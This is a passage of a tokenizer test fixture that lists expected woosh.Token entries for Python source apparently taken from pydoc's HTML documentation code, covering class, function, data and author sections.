woosh.Token(woosh.OP, '[', 826, 24, 826, 25),
woosh.Token(woosh.NAME, 'value', 826, 25, 826, 30),
woosh.Token(woosh.NAME, 'for', 826, 31, 826, 34),
woosh.Token(woosh.OP, '(', 826, 35, 826, 36),
woosh.Token(woosh.NAME, 'key', 826, 36, 826, 39),
woosh.Token(woosh.OP, ',', 826, 39, 826, 40),
woosh.Token(woosh.NAME, 'value', 826, 41, 826, 46),
woosh.Token(woosh.OP, ')', 826, 46, 826, 47),
woosh.Token(woosh.NAME, 'in', 826, 48, 826, 50),
woosh.Token(woosh.NAME, 'classes', 826, 51, 826, 58),
woosh.Token(woosh.OP, ']', 826, 58, 826, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 826, 59, 827, 0),
woosh.Token(woosh.NAME, 'contents', 827, 12, 827, 20),
woosh.Token(woosh.OP, '=', 827, 21, 827, 22),
woosh.Token(woosh.OP, '[', 827, 23, 827, 24),
woosh.Token(woosh.NAME, 'self', 828, 16, 828, 20),
woosh.Token(woosh.OP, '.', 828, 20, 828, 21),
woosh.Token(woosh.NAME, 'formattree', 828, 21, 828, 31),
woosh.Token(woosh.OP, '(', 828, 31, 828, 32),
woosh.Token(woosh.NAME, 'inspect', 828, 32, 828, 39),
woosh.Token(woosh.OP, '.', 828, 39, 828, 40),
woosh.Token(woosh.NAME, 'getclasstree', 828, 40, 828, 52),
woosh.Token(woosh.OP, '(', 828, 52, 828, 53),
woosh.Token(woosh.NAME, 'classlist', 828, 53, 828, 62),
woosh.Token(woosh.OP, ',', 828, 62, 828, 63),
woosh.Token(woosh.NUMBER, '1', 828, 64, 828, 65),
woosh.Token(woosh.OP, ')', 828, 65, 828, 66),
woosh.Token(woosh.OP, ',', 828, 66, 828, 67),
woosh.Token(woosh.NAME, 'name', 828, 68, 828, 72),
woosh.Token(woosh.OP, ')', 828, 72, 828, 73),
woosh.Token(woosh.OP, ']', 828, 73, 828, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 828, 74, 829, 0),
woosh.Token(woosh.NAME, 'for', 829, 12, 829, 15),
woosh.Token(woosh.NAME, 'key', 829, 16, 829, 19),
woosh.Token(woosh.OP, ',', 829, 19, 829, 20),
woosh.Token(woosh.NAME, 'value', 829, 21, 829, 26),
woosh.Token(woosh.NAME, 'in', 829, 27, 829, 29),
woosh.Token(woosh.NAME, 'classes', 829, 30, 829, 37),
woosh.Token(woosh.OP, ':', 829, 37, 829, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 829, 38, 830, 0),
woosh.Token(woosh.INDENT, ' ', 830, 0, 830, 16),
woosh.Token(woosh.NAME, 'contents', 830, 16, 830, 24),
woosh.Token(woosh.OP, '.', 830, 24, 830, 25),
woosh.Token(woosh.NAME, 'append', 830, 25, 830, 31),
woosh.Token(woosh.OP, '(', 830, 31, 830, 32),
woosh.Token(woosh.NAME, 'self', 830, 32, 830, 36),
woosh.Token(woosh.OP, '.', 830, 36, 830, 37),
woosh.Token(woosh.NAME, 'document', 830, 37, 830, 45),
woosh.Token(woosh.OP, '(', 830, 45, 830, 46),
woosh.Token(woosh.NAME, 'value', 830, 46, 830, 51),
woosh.Token(woosh.OP, ',', 830, 51, 830, 52),
woosh.Token(woosh.NAME, 'key', 830, 53, 830, 56),
woosh.Token(woosh.OP, ',', 830, 56, 830, 57),
woosh.Token(woosh.NAME, 'name', 830, 58, 830, 62),
woosh.Token(woosh.OP, ',', 830, 62, 830, 63),
woosh.Token(woosh.NAME, 'fdict', 830, 64, 830, 69),
woosh.Token(woosh.OP, ',', 830, 69, 830, 70),
woosh.Token(woosh.NAME, 'cdict', 830, 71, 830, 76),
woosh.Token(woosh.OP, ')', 830, 76, 830, 77),
woosh.Token(woosh.OP, ')', 830, 77, 830, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 830, 78, 831, 0),
woosh.Token(woosh.DEDENT, ' ', 831, 0, 831, 12),
woosh.Token(woosh.NAME, 'result', 831, 12, 831, 18),
woosh.Token(woosh.OP, '=', 831, 19, 831, 20),
woosh.Token(woosh.NAME, 'result', 831, 21, 831, 27),
woosh.Token(woosh.OP, '+', 831, 28, 831, 29),
woosh.Token(woosh.NAME, 'self', 831, 30, 831, 34),
woosh.Token(woosh.OP, '.', 831, 34, 831, 35),
woosh.Token(woosh.NAME, 'bigsection', 831, 35, 831, 45),
woosh.Token(woosh.OP, '(', 831, 45, 831, 46),
woosh.Token(woosh.STRING, "'Classes'", 832, 16, 832, 25),
woosh.Token(woosh.OP, ',', 832, 25, 832, 26),
woosh.Token(woosh.STRING, "'#ffffff'", 832, 27, 832, 36),
woosh.Token(woosh.OP, ',', 832, 36, 832, 37),
woosh.Token(woosh.STRING, "'#ee77aa'", 832, 38, 832, 47),
woosh.Token(woosh.OP, ',', 832, 47, 832, 48),
woosh.Token(woosh.STRING, "' '", 832, 49, 832, 52),
woosh.Token(woosh.OP, '.', 832, 52, 832, 53),
woosh.Token(woosh.NAME, 'join', 832, 53, 832, 57),
woosh.Token(woosh.OP, '(', 832, 57, 832, 58),
woosh.Token(woosh.NAME, 'contents', 832, 58, 832, 66),
woosh.Token(woosh.OP, ')', 832, 66, 832, 67),
woosh.Token(woosh.OP, ')', 832, 67, 832, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 832, 68, 833, 0),
woosh.Token(woosh.DEDENT, ' ', 833, 0, 833, 8),
woosh.Token(woosh.NAME, 'if', 833, 8, 833, 10),
woosh.Token(woosh.NAME, 'funcs', 833, 11, 833, 16),
woosh.Token(woosh.OP, ':', 833, 16, 833, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 833, 17, 834, 0),
woosh.Token(woosh.INDENT, ' ', 834, 0, 834, 12),
woosh.Token(woosh.NAME, 'contents', 834, 12, 834, 20),
woosh.Token(woosh.OP, '=', 834, 21, 834, 22),
woosh.Token(woosh.OP, '[', 834, 23, 834, 24),
woosh.Token(woosh.OP, ']', 834, 24, 834, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 834, 25, 835, 0),
woosh.Token(woosh.NAME, 'for', 835, 12, 835, 15),
woosh.Token(woosh.NAME, 'key', 835, 16, 835, 19),
woosh.Token(woosh.OP, ',', 835, 19, 835, 20),
woosh.Token(woosh.NAME, 'value', 835, 21, 835, 26),
woosh.Token(woosh.NAME, 'in', 835, 27, 835, 29),
woosh.Token(woosh.NAME, 'funcs', 835, 30, 835, 35),
woosh.Token(woosh.OP, ':', 835, 35, 835, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 835, 36, 836, 0),
woosh.Token(woosh.INDENT, ' ', 836, 0, 836, 16),
woosh.Token(woosh.NAME, 'contents', 836, 16, 836, 24),
woosh.Token(woosh.OP, '.', 836, 24, 836, 25),
woosh.Token(woosh.NAME, 'append', 836, 25, 836, 31),
woosh.Token(woosh.OP, '(', 836, 31, 836, 32),
woosh.Token(woosh.NAME, 'self', 836, 32, 836, 36),
woosh.Token(woosh.OP, '.', 836, 36, 836, 37),
woosh.Token(woosh.NAME, 'document', 836, 37, 836, 45),
woosh.Token(woosh.OP, '(', 836, 45, 836, 46),
woosh.Token(woosh.NAME, 'value', 836, 46, 836, 51),
woosh.Token(woosh.OP, ',', 836, 51, 836, 52),
woosh.Token(woosh.NAME, 'key', 836, 53, 836, 56),
woosh.Token(woosh.OP, ',', 836, 56, 836, 57),
woosh.Token(woosh.NAME, 'name', 836, 58, 836, 62),
woosh.Token(woosh.OP, ',', 836, 62, 836, 63),
woosh.Token(woosh.NAME, 'fdict', 836, 64, 836, 69),
woosh.Token(woosh.OP, ',', 836, 69, 836, 70),
woosh.Token(woosh.NAME, 'cdict', 836, 71, 836, 76),
woosh.Token(woosh.OP, ')', 836, 76, 836, 77),
woosh.Token(woosh.OP, ')', 836, 77, 836, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 836, 78, 837, 0),
woosh.Token(woosh.DEDENT, ' ', 837, 0, 837, 12),
woosh.Token(woosh.NAME, 'result', 837, 12, 837, 18),
woosh.Token(woosh.OP, '=', 837, 19, 837, 20),
woosh.Token(woosh.NAME, 'result', 837, 21, 837, 27),
woosh.Token(woosh.OP, '+', 837, 28, 837, 29),
woosh.Token(woosh.NAME, 'self', 837, 30, 837, 34),
woosh.Token(woosh.OP, '.', 837, 34, 837, 35),
woosh.Token(woosh.NAME, 'bigsection', 837, 35, 837, 45),
woosh.Token(woosh.OP, '(', 837, 45, 837, 46),
woosh.Token(woosh.STRING, "'Functions'", 838, 16, 838, 27),
woosh.Token(woosh.OP, ',', 838, 27, 838, 28),
woosh.Token(woosh.STRING, "'#ffffff'", 838, 29, 838, 38),
woosh.Token(woosh.OP, ',', 838, 38, 838, 39),
woosh.Token(woosh.STRING, "'#eeaa77'", 838, 40, 838, 49),
woosh.Token(woosh.OP, ',', 838, 49, 838, 50),
woosh.Token(woosh.STRING, "' '", 838, 51, 838, 54),
woosh.Token(woosh.OP, '.', 838, 54, 838, 55),
woosh.Token(woosh.NAME, 'join', 838, 55, 838, 59),
woosh.Token(woosh.OP, '(', 838, 59, 838, 60),
woosh.Token(woosh.NAME, 'contents', 838, 60, 838, 68),
woosh.Token(woosh.OP, ')', 838, 68, 838, 69),
woosh.Token(woosh.OP, ')', 838, 69, 838, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 838, 70, 839, 0),
woosh.Token(woosh.DEDENT, ' ', 839, 0, 839, 8),
woosh.Token(woosh.NAME, 'if', 839, 8, 839, 10),
woosh.Token(woosh.NAME, 'data', 839, 11, 839, 15),
woosh.Token(woosh.OP, ':', 839, 15, 839, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 839, 16, 840, 0),
woosh.Token(woosh.INDENT, ' ', 840, 0, 840, 12),
woosh.Token(woosh.NAME, 'contents', 840, 12, 840, 20),
woosh.Token(woosh.OP, '=', 840, 21, 840, 22),
woosh.Token(woosh.OP, '[', 840, 23, 840, 24),
woosh.Token(woosh.OP, ']', 840, 24, 840, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 840, 25, 841, 0),
woosh.Token(woosh.NAME, 'for', 841, 12, 841, 15),
woosh.Token(woosh.NAME, 'key', 841, 16, 841, 19),
woosh.Token(woosh.OP, ',', 841, 19, 841, 20),
woosh.Token(woosh.NAME, 'value', 841, 21, 841, 26),
woosh.Token(woosh.NAME, 'in', 841, 27, 841, 29),
woosh.Token(woosh.NAME, 'data', 841, 30, 841, 34),
woosh.Token(woosh.OP, ':', 841, 34, 841, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 841, 35, 842, 0),
woosh.Token(woosh.INDENT, ' ', 842, 0, 842, 16),
woosh.Token(woosh.NAME, 'contents', 842, 16, 842, 24),
woosh.Token(woosh.OP, '.', 842, 24, 842, 25),
woosh.Token(woosh.NAME, 'append', 842, 25, 842, 31),
woosh.Token(woosh.OP, '(', 842, 31, 842, 32),
woosh.Token(woosh.NAME, 'self', 842, 32, 842, 36),
woosh.Token(woosh.OP, '.', 842, 36, 842, 37),
woosh.Token(woosh.NAME, 'document', 842, 37, 842, 45),
woosh.Token(woosh.OP, '(', 842, 45, 842, 46),
woosh.Token(woosh.NAME, 'value', 842, 46, 842, 51),
woosh.Token(woosh.OP, ',', 842, 51, 842, 52),
woosh.Token(woosh.NAME, 'key', 842, 53, 842, 56),
woosh.Token(woosh.OP, ')', 842, 56, 842, 57),
woosh.Token(woosh.OP, ')', 842, 57, 842, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 842, 58, 843, 0),
woosh.Token(woosh.DEDENT, ' ', 843, 0, 843, 12),
woosh.Token(woosh.NAME, 'result', 843, 12, 843, 18),
woosh.Token(woosh.OP, '=', 843, 19, 843, 20),
woosh.Token(woosh.NAME, 'result', 843, 21, 843, 27),
woosh.Token(woosh.OP, '+', 843, 28, 843, 29),
woosh.Token(woosh.NAME, 'self', 843, 30, 843, 34),
woosh.Token(woosh.OP, '.', 843, 34, 843, 35),
woosh.Token(woosh.NAME, 'bigsection', 843, 35, 843, 45),
woosh.Token(woosh.OP, '(', 843, 45, 843, 46),
woosh.Token(woosh.STRING, "'Data'", 844, 16, 844, 22),
woosh.Token(woosh.OP, ',', 844, 22, 844, 23),
woosh.Token(woosh.STRING, "'#ffffff'", 844, 24, 844, 33),
woosh.Token(woosh.OP, ',', 844, 33, 844, 34),
woosh.Token(woosh.STRING, "'#55aa55'", 844, 35, 844, 44),
woosh.Token(woosh.OP, ',', 844, 44, 844, 45),
woosh.Token(woosh.STRING, "'<br>\\n'", 844, 46, 844, 54),
woosh.Token(woosh.OP, '.', 844, 54, 844, 55),
woosh.Token(woosh.NAME, 'join', 844, 55, 844, 59),
woosh.Token(woosh.OP, '(', 844, 59, 844, 60),
woosh.Token(woosh.NAME, 'contents', 844, 60, 844, 68),
woosh.Token(woosh.OP, ')', 844, 68, 844, 69),
woosh.Token(woosh.OP, ')', 844, 69, 844, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 844, 70, 845, 0),
woosh.Token(woosh.DEDENT, ' ', 845, 0, 845, 8),
woosh.Token(woosh.NAME, 'if', 845, 8, 845, 10),
woosh.Token(woosh.NAME, 'hasattr', 845, 11, 845, 18),
woosh.Token(woosh.OP, '(', 845, 18, 845, 19),
woosh.Token(woosh.NAME, 'object', 845, 19, 845, 25),
woosh.Token(woosh.OP, ',', 845, 25, 845, 26),
woosh.Token(woosh.STRING, "'__author__'", 845, 27, 845, 39),
woosh.Token(woosh.OP, ')', 845, 39, 845, 40),
woosh.Token(woosh.OP, ':', 845, 40, 845, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 845, 41, 846, 0),
woosh.Token(woosh.INDENT, ' ', 846, 0, 846, 12),
woosh.Token(woosh.NAME, 'contents', 846, 12, 846, 20),
woosh.Token(woosh.OP, '=', 846, 21, 846, 22),
woosh.Token(woosh.NAME, 'self', 846, 23, 846, 27),
woosh.Token(woosh.OP, '.', 846, 27, 846, 28),
woosh.Token(woosh.NAME, 'markup', 846, 28, 846, 34),
woosh.Token(woosh.OP, '(', 846, 34, 846, 35),
woosh.Token(woosh.NAME, 'str', 846, 35, 846, 38),
woosh.Token(woosh.OP, '(', 846, 38, 846, 39),
woosh.Token(woosh.NAME, 'object', 846, 39, 846, 45),
woosh.Token(woosh.OP, '.', 846, 45, 846, 46),
woosh.Token(woosh.NAME, '__author__', 846, 46, 846, 56),
woosh.Token(woosh.OP, ')', 846, 56, 846, 57),
woosh.Token(woosh.OP, ',', 846, 57, 846, 58),
woosh.Token(woosh.NAME, 'self', 846, 59, 846, 63),
woosh.Token(woosh.OP, '.', 846, 63, 846, 64),
woosh.Token(woosh.NAME, 'preformat', 846, 64, 846, 73),
woosh.Token(woosh.OP, ')', 846, 73, 846, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 846, 74, 847, 0),
woosh.Token(woosh.NAME, 'result', 847, 12, 847, 18),
woosh.Token(woosh.OP, '=', 847, 19, 847, 20),
woosh.Token(woosh.NAME, 'result', 847, 21, 847, 27),
woosh.Token(woosh.OP, '+', 847, 28, 847, 29),
woosh.Token(woosh.NAME, 'self', 847, 30, 847, 34),
woosh.Token(woosh.OP, '.', 847, 34, 847, 35),
woosh.Token(woosh.NAME, 'bigsection', 847, 35, 847, 45),
woosh.Token(woosh.OP, '(', 847, 45, 847, 46),
woosh.Token(woosh.STRING, "'Author'", 848, 16, 848, 24),
woosh.Token(woosh.OP, ',', 848, 24, 848, 25),
woosh.Token(woosh.STRING, "'#ffffff'", 848, 26, 848, 35),
woosh.Token(woosh.OP, ',', 848, 35, 848, 36),
woosh.Token(woosh.STRING, "'#7799ee'", 848, 37, 848, 46),
woosh.Token(woosh.OP, ',', 848, 46, 848, 47),
woosh.Token(woosh.NAME, 'contents', 848, 48, 848, 56),
woosh.Token(woosh.OP, ')', 848, 56, 848, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 848, 57, 849, 0),
woosh.Token(woosh.DEDENT, ' ', 849, 0, 849, 8),
woosh.Token(woosh.NAME, 'if', 849, 8, 849, 10),
woosh.Token(woosh.NAME, 'hasattr', 849, 11, 849, 18),
woosh.Token(woosh.OP, '(', 849, 18, 849, 19),
woosh.Token(woosh.NAME, 'object', 849, 19, 849, 25),
woosh.Token(woosh.OP, ',', 849, 25, 849, 26),
woosh.Token(woosh.STRING, "'__credits__'", 849, 27, 849, 40),
woosh.Token(woosh.OP, ')', 849, 40, 849, 41),
woosh.Token(woosh.OP, ':', 849, 41, 849, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 849, 42, 850, 0),
woosh.Token(woosh.INDENT, ' ', 850, 0, 850, 12),
woosh.Token(woosh.NAME, 'contents', 850, 12, 850, 20),
woosh.Token(woosh.OP, '=', 850, 21, 850, 22),
woosh.Token(woosh.NAME, 'self', 850, 23, 850, 27),
woosh.Token(woosh.OP, '.', 850, 27, 850, 28),
woosh.Token(woosh.NAME, 'markup', 850, 28, 850, 34),
woosh.Token(woosh.OP, '(', 850, 34, 850, 35),
woosh.Token(woosh.NAME, 'str', 850, 35, 850, 38),
woosh.Token(woosh.OP, '(', 850, 38, 850, 39),
woosh.Token(woosh.NAME, 'object', 850, 39, 850, 45),
woosh.Token(woosh.OP, '.', 850, 45, 850, 46),
woosh.Token(woosh.NAME, '__credits__', 850, 46, 850, 57),
woosh.Token(woosh.OP, ')', 850, 57, 850, 58),
woosh.Token(woosh.OP, ',', 850, 58, 850, 59),
woosh.Token(woosh.NAME, 'self', 850, 60, 850, 64),
woosh.Token(woosh.OP, '.', 850, 64, 850, 65),
woosh.Token(woosh.NAME, 'preformat', 850, 65, 850, 74),
woosh.Token(woosh.OP, ')', 850, 74, 850, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 850, 75, 851, 0),
woosh.Token(woosh.NAME, 'result', 851, 12, 851, 18),
woosh.Token(woosh.OP, '=', 851, 19, 851, 20),
woosh.Token(woosh.NAME, 'result', 851, 21, 851, 27),
woosh.Token(woosh.OP, '+', 851, 28, 851, 29),
woosh.Token(woosh.NAME, 'self', 851, 30, 851, 34),
woosh.Token(woosh.OP, '.', 851, 34, 851, 35),
woosh.Token(woosh.NAME, 'bigsection', 851, 35, 851, 45),
woosh.Token(woosh.OP, '(', 851, 45, 851, 46),
woosh.Token(woosh.STRING, "'Credits'", 852, 16, 852, 25),
woosh.Token(woosh.OP, ',', 852, 25, 852, 26),
woosh.Token(woosh.STRING, "'#ffffff'", 852, 27, 852, 36),
woosh.Token(woosh.OP, ',', 852, 36, 852, 37),
woosh.Token(woosh.STRING, "'#7799ee'", 852, 38, 852, 47),
woosh.Token(woosh.OP, ',', 852, 47, 852, 48),
woosh.Token(woosh.NAME, 'contents', 852, 49, 852, 57),
woosh.Token(woosh.OP, ')', 852, 57, 852, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 852, 58, 853, 0),
woosh.Token(woosh.DEDENT, ' ', 854, 0, 854, 8),
woosh.Token(woosh.NAME, 'return', 854, 8, 854, 14),
woosh.Token(woosh.NAME, 'result', 854, 15, 854, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 854, 21, 855, 0),
woosh.Token(woosh.DEDENT, ' ', 856, 0, 856, 4),
woosh.Token(woosh.NAME, 'def', 856, 4, 856, 7),
woosh.Token(woosh.NAME, 'docclass', 856, 8, 856, 16),
woosh.Token(woosh.OP, '(', 856, 16, 856, 17),
woosh.Token(woosh.NAME, 'self', 856, 17, 856, 21),
woosh.Token(woosh.OP, ',', 856, 21, 856, 22),
woosh.Token(woosh.NAME, 'object', 856, 23, 856, 29),
woosh.Token(woosh.OP, ',', 856, 29, 856, 30),
woosh.Token(woosh.NAME, 'name', 856, 31, 856, 35),
woosh.Token(woosh.OP, '=', 856, 35, 856, 36),
woosh.Token(woosh.NAME, 'None', 856, 36, 856, 40),
woosh.Token(woosh.OP, ',', 856, 40, 856, 41),
woosh.Token(woosh.NAME, 'mod', 856, 42, 856, 45),
woosh.Token(woosh.OP, '=', 856, 45, 856, 46),
woosh.Token(woosh.NAME, 'None', 856, 46, 856, 50),
woosh.Token(woosh.OP, ',', 856, 50, 856, 51),
woosh.Token(woosh.NAME, 'funcs', 856, 52, 856, 57),
woosh.Token(woosh.OP, '=', 856, 57, 856, 58),
woosh.Token(woosh.OP, '{', 856, 58, 856, 59),
woosh.Token(woosh.OP, '}', 856, 59, 856, 60),
woosh.Token(woosh.OP, ',', 856, 60, 856, 61),
woosh.Token(woosh.NAME, 'classes', 856, 62, 856, 69),
woosh.Token(woosh.OP, '=', 856, 69, 856, 70),
woosh.Token(woosh.OP, '{', 856, 70, 856, 71),
woosh.Token(woosh.OP, '}', 856, 71, 856, 72),
woosh.Token(woosh.OP, ',', 856, 72, 856, 73),
woosh.Token(woosh.OP, '*', 857, 17, 857, 18),
woosh.Token(woosh.NAME, 'ignored', 857, 18, 857, 25),
woosh.Token(woosh.OP, ')', 857, 25, 857, 26),
woosh.Token(woosh.OP, ':', 857, 26, 857, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 857, 27, 858, 0),
woosh.Token(woosh.INDENT, ' ', 858, 0, 858, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a class object."""', 858, 8, 858, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 858, 60, 859, 0),
woosh.Token(woosh.NAME, 'realname', 859, 8, 859, 16),
woosh.Token(woosh.OP, '=', 859, 17, 859, 18),
woosh.Token(woosh.NAME, 'object', 859, 19, 859, 25),
woosh.Token(woosh.OP, '.', 859, 25, 859, 26),
woosh.Token(woosh.NAME, '__name__', 859, 26, 859, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 859, 34, 860, 0),
woosh.Token(woosh.NAME, 'name', 860, 8, 860, 12),
woosh.Token(woosh.OP, '=', 860, 13, 860, 14),
woosh.Token(woosh.NAME, 'name', 860, 15, 860, 19),
woosh.Token(woosh.NAME, 'or', 860, 20, 860, 22),
woosh.Token(woosh.NAME, 'realname', 860, 23, 860, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 860, 31, 861, 0),
woosh.Token(woosh.NAME, 'bases', 861, 8, 861, 13),
woosh.Token(woosh.OP, '=', 861, 14, 861, 15),
woosh.Token(woosh.NAME, 'object', 861, 16, 861, 22),
woosh.Token(woosh.OP, '.', 861, 22, 861, 23),
woosh.Token(woosh.NAME, '__bases__', 861, 23, 861, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 861, 32, 862, 0),
woosh.Token(woosh.NAME, 'contents', 863, 8, 863, 16),
woosh.Token(woosh.OP, '=', 863, 17, 863, 18),
woosh.Token(woosh.OP, '[', 863, 19, 863, 20),
woosh.Token(woosh.OP, ']', 863, 20, 863, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 863, 21, 864, 0),
woosh.Token(woosh.NAME, 'push', 864, 8, 864, 12),
woosh.Token(woosh.OP, '=', 864, 13, 864, 14),
woosh.Token(woosh.NAME, 'contents', 864, 15, 864, 23),
woosh.Token(woosh.OP, '.', 864, 23, 864, 24),
woosh.Token(woosh.NAME, 'append', 864, 24, 864, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 864, 30, 865, 0),
woosh.Token(woosh.COMMENT, '# Cute little class to pump out a horizontal rule between sections.', 866, 8, 866, 75),
woosh.Token(woosh.NAME, 'class', 867, 8, 867, 13),
woosh.Token(woosh.NAME, 'HorizontalRule', 867, 14, 867, 28),
woosh.Token(woosh.OP, ':', 867, 28, 867, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 867, 29, 868, 0),
woosh.Token(woosh.INDENT, ' ', 868, 0, 868, 12),
woosh.Token(woosh.NAME, 'def', 868, 12, 868, 15),
woosh.Token(woosh.NAME, '__init__', 868, 16, 868, 24),
woosh.Token(woosh.OP, '(', 868, 24, 868, 25),
woosh.Token(woosh.NAME, 'self', 868, 25, 868, 29),
woosh.Token(woosh.OP, ')', 868, 29, 868, 30),
woosh.Token(woosh.OP, ':', 868, 30, 868, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 868, 31, 869, 0),
woosh.Token(woosh.INDENT, ' ', 869, 0, 869, 16),
woosh.Token(woosh.NAME, 'self', 869, 16, 869, 20),
woosh.Token(woosh.OP, '.', 869, 20, 869, 21),
woosh.Token(woosh.NAME, 'needone', 869, 21, 869, 28),
woosh.Token(woosh.OP, '=', 869, 29, 869, 30),
woosh.Token(woosh.NUMBER, '0', 869, 31, 869, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 869, 32, 870, 0),
woosh.Token(woosh.DEDENT, ' ', 870, 0, 870, 12),
woosh.Token(woosh.NAME, 'def', 870, 12, 870, 15),
woosh.Token(woosh.NAME, 'maybe', 870, 16, 870, 21),
woosh.Token(woosh.OP, '(', 870, 21, 870, 22),
woosh.Token(woosh.NAME, 'self', 870, 22, 870, 26),
woosh.Token(woosh.OP, ')', 870, 26, 870, 27),
woosh.Token(woosh.OP, ':', 870, 27, 870, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 870, 28, 871, 0),
woosh.Token(woosh.INDENT, ' ', 871, 0, 871, 16),
woosh.Token(woosh.NAME, 'if', 871, 16, 871, 18),
woosh.Token(woosh.NAME, 'self', 871, 19, 871, 23),
woosh.Token(woosh.OP, '.', 871, 23, 871, 24),
woosh.Token(woosh.NAME, 'needone', 871, 24, 871, 31),
woosh.Token(woosh.OP, ':', 871, 31, 871, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 871, 32, 872, 0),
woosh.Token(woosh.INDENT, ' ', 872, 0, 872, 20),
woosh.Token(woosh.NAME, 'push', 872, 20, 872, 24),
woosh.Token(woosh.OP, '(', 872, 24, 872, 25),
woosh.Token(woosh.STRING, "'<hr>\\n'", 872, 25, 872, 33),
woosh.Token(woosh.OP, ')', 872, 33, 872, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 872, 34, 873, 0),
woosh.Token(woosh.DEDENT, ' ', 873, 0, 873, 16),
woosh.Token(woosh.NAME, 'self', 873, 16, 873, 20),
woosh.Token(woosh.OP, '.', 873, 20, 873, 21),
woosh.Token(woosh.NAME, 'needone', 873, 21, 873, 28),
woosh.Token(woosh.OP, '=', 873, 29, 873, 30),
woosh.Token(woosh.NUMBER, '1', 873, 31, 873, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 873, 32, 874, 0),
woosh.Token(woosh.DEDENT, ' ', 874, 0, 874, 8),
woosh.Token(woosh.DEDENT, '', 874, 8, 874, 8),
woosh.Token(woosh.NAME, 'hr', 874, 8, 874, 10),
woosh.Token(woosh.OP, '=', 874, 11, 874, 12),
woosh.Token(woosh.NAME, 'HorizontalRule', 874, 13, 874, 27),
woosh.Token(woosh.OP, '(', 874, 27, 874, 28),
woosh.Token(woosh.OP, ')', 874, 28, 874, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 874, 29, 875, 0),
woosh.Token(woosh.COMMENT, '# List the mro, if non-trivial.', 876, 8, 876, 39),
woosh.Token(woosh.NAME, 'mro', 877, 8, 877, 11),
woosh.Token(woosh.OP, '=', 877, 12, 877, 13),
woosh.Token(woosh.NAME, 'deque', 877, 14, 877, 19),
woosh.Token(woosh.OP, '(', 877, 19, 877, 20),
woosh.Token(woosh.NAME, 'inspect', 877, 20, 877, 27),
woosh.Token(woosh.OP, '.', 877, 27, 877, 28),
woosh.Token(woosh.NAME, 'getmro', 877, 28, 877, 34),
woosh.Token(woosh.OP, '(', 877, 34, 877, 35),
woosh.Token(woosh.NAME, 'object', 877, 35, 877, 41),
woosh.Token(woosh.OP, ')', 877, 41, 877, 42),
woosh.Token(woosh.OP, ')', 877, 42, 877, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 877, 43, 878, 0),
woosh.Token(woosh.NAME, 'if', 878, 8, 878, 10),
woosh.Token(woosh.NAME, 'len', 878, 11, 878, 14),
woosh.Token(woosh.OP, '(', 878, 14, 878, 15),
woosh.Token(woosh.NAME, 'mro', 878, 15, 878, 18),
woosh.Token(woosh.OP, ')', 878, 18, 878, 19),
woosh.Token(woosh.OP, '>', 878, 20, 878, 21),
woosh.Token(woosh.NUMBER, '2', 878, 22, 878, 23),
woosh.Token(woosh.OP, ':', 878, 23, 878, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 878, 24, 879, 0),
woosh.Token(woosh.INDENT, ' ', 879, 0, 879, 12),
woosh.Token(woosh.NAME, 'hr', 879, 12, 879, 14),
woosh.Token(woosh.OP, '.', 879, 14, 879, 15),
woosh.Token(woosh.NAME, 'maybe', 879, 15, 879, 20),
woosh.Token(woosh.OP, '(', 879, 20, 879, 21),
woosh.Token(woosh.OP, ')', 879, 21, 879, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 879, 22, 880, 0),
woosh.Token(woosh.NAME, 'push', 880, 12, 880, 16),
woosh.Token(woosh.OP, '(', 880, 16, 880, 17),
woosh.Token(woosh.STRING, "'<dl><dt>Method resolution order:</dt>\\n'", 880, 17, 880, 58),
woosh.Token(woosh.OP, ')', 880, 58, 880, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 880, 59, 881, 0),
woosh.Token(woosh.NAME, 'for', 881, 12, 881, 15),
woosh.Token(woosh.NAME, 'base', 881, 16, 881, 20),
woosh.Token(woosh.NAME, 'in', 881, 21, 881, 23),
woosh.Token(woosh.NAME, 'mro', 881, 24, 881, 27),
woosh.Token(woosh.OP, ':', 881, 27, 881, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 881, 28, 882, 0),
woosh.Token(woosh.INDENT, ' ', 882, 0, 882, 16),
woosh.Token(woosh.NAME, 'push', 882, 16, 882, 20),
woosh.Token(woosh.OP, '(', 882, 20, 882, 21),
woosh.Token(woosh.STRING, "'<dd>%s</dd>\\n'", 882, 21, 882, 36),
woosh.Token(woosh.OP, '%', 882, 37, 882, 38),
